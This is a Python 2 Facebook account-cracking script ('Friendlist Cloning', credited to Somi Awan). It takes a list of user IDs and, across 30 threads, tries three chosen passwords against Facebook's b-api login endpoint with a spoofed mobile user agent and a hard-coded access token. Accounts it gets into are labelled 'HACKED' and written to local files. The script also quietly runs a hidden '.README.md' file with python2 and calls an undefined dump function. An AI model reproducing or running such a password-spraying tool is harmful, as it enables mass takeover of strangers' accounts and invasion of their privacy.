#!/usr/bin/python2
#coding=utf-8
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')

try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 .README.md')

from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/2.1.0 (Linux; U; Android 9; SM-N950U Build/PPR1.180610.011) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
http_proxy  = "http://10.10.1.10:3128"
https_proxy = "https://10.10.1.11:1080"
def exb():
    print '[!] Exit Successfully'
    os.sys.exit()


def exxb():
    print '[!] \x1b[1;91m MOST WELL \x1b[3;92;40m COME\x1b[1;95m SO\x1b[1;97mMI \x1b[1;91m\x1b[0;34;40m'
    os.sys.exit()

def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e) 
        sys.stdout.flush()
        time.sleep(3.0 / 200)


def tik():
    titik = [
     '   ', '.  ', '.. ', '...', '.. ', '.  ', '   ']
    for o in titik:
        print '\r\x1b[1;91m     [\xe2\x97\x8f] \x1b[1;92m \x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.10)




def jaalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(2.0 / 9900)


def t():
    time.sleep(1)


def cb():
    os.system('clear') 

logo = """
       \033[1;91m_____    ____      __  __   _____ 
     \033[1;91m / ____|  / __ \    |  \/  | |_   _|
    \033[1;92m | (___   | |  | |   | \  / |   | |  
    \033[1;92m  \___ \  | |  | |   | |\/| |   | |  
    \033[1;95m  ____) | | |__| |   | |  | |  _| |_ 
    \033[1;95m |_____/   \____/    |_|  |_| |_____|
"""
logo1 = """
\033[1;33mCreater - Somi Awan
\033[1;33mWithout login Friendlist Cloning Command 
\033[1;36mFirst Dump Fb Accounts Then Copy Path..
\033[1;31m  And paste Your File Easily 
"""
                                   
back = 0
successful = []
cpb = []
oks = []
id = []

def menu():
    os.system('clear')
    print 47 * '\033[1;97m-'
    print logo
    print 47 * '\033[1;97m-'
    print
    print 47 * '\033[1;91m-'
    print
    psb('\033[1;33m[\033[1;92m01\033[1;36m] \033[1;37mPAKISTAN DIGIT CRACKING')
    time.sleep(0.05)
    psb('\033[1;33m[\033[1;92m01\033[1;36m] \033[1;37mDUMP FILE ')
    print
    psb('\033[1;33m[\033[1;92m00\033[1;36m] \033[1;37mCLOSE')
    print
    print 47 * '\033[1;91m-'
    action()


def action():
    global cpb
    global oks
    bch = raw_input('\n\n \x1b[1;96m>   ')
    if bch == '':
        print '[!] Fill in correctly'
        action()
    elif bch == '1':
        tik()
        os.system('clear')
        
        print 47 * '\033[1;97m-'
        print logo
        print 47 * '\033[1;97m-'
        print logo1 
        try:
            idlist = raw_input('\033[1;97m{\033[1;92m+\033[1;97m} \033[1;93mEnter Name File\033[1;91m :\033[1;92m ')
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())
        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
          
    elif bch == '2':
    	dump()
    elif bch == '00':
        exb()
    else:
        print '[!] Fill in correctly'
        action()
    pass1 = raw_input('\x1b[1;96mEnter Password 1>   ')
    pass2 = raw_input('\x1b[1;96mEnter Password 2>   ')
    pass3 = raw_input('\x1b[1;96mEnter Password 3>   ')
    xxx = str(len(id))
    print 47 * '-'
    psb('\033[1;97m[\033[1;92m+\033[1;97m] \033[1;93mTotal Account Number : ' + xxx)
    time.sleep(0.5)
    print
    print 47 * '\033[1;91m-'
    psb('\033[1;97m[\033[1;91m!\033[1;97m] \033[1;93mTo Stop This Process Press CTRL Then[Z]')
    print 47 * '\033[1;91m-'
    print

    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+ user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' +user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(user + '|' + pass1 + '\n')
                okb.close()
                oks.append(user + pass1)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;97m  ' + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
                cps = open('save/checkpoint.txt', 'a')
                cps.write(user + '|' + pass1 + '\n')
                cps.close()
                cpb.append(user + pass1)
            else:
                
                data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                q = json.load(data)
                if 'access_token' in q:
                    print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
                    okb = open('save/successfull.txt', 'a')
                    okb.write(user + '|' + pass2 + '\n')
                    okb.close()
                    oks.append(user + pass2)
                elif 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;97m  '  + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(user + '|' + pass2 + '\n')
                    cps.close()
                    cpb.append(user + pass2)
                else:
                    
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='  + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
                        okb = open('save/successfull.txt', 'a')
                        okb.write(user + '|' + pass3 + '\n')
                        okb.close()
                        oks.append(user + pass3)
                    elif 'www.facebook.com' in q['error_msg']:
                        print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;97m  ' + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
                        cps = open('save/checkpoint.txt', 'a')
                        cps.write(user + '|' + pass3 + '\n')
                        cps.close()
                        cpb.append(user + pass3)
  
            
                
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print 50 * '-'
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    menu()


		

if __name__ == '__main__':
    menu()
